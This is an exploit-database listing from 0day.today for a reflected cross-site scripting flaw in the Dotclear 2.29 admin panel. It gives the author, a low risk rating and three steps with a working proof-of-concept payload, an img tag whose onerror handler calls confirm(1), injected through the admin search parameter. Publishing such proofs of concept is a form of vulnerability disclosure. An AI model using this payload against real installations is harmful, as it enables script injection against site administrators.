[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Dotclear 2.29 Cross Site Scripting Vulnerability

Author
tmrswrr
Risk
[
Security Risk Low
]
0day-ID
0day-ID-39353
Category
web applications
Date add
22-02-2024
Platform
php
# Exploit Title: Dotclear Version : 2.29 - Reflected XSS 
# Exploit Author: tmrswrr
# Vendor Homepage: https://dotclear.org/
# Version : 2.29
# Tested on: https://softaculous.com/demos/dotclear

1 ) Enter admin panel after write search button this payload : "><img src=x onerrora=confirm() onerror=confirm(1)>
2 ) https://127.0.0.1/Dotclear/admin/index.php?qx="><img src=x onerrora=confirm() onerror=confirm(1)>&process=Search
3 ) You will be see alert button

#  0day.today [2024-11-15]  #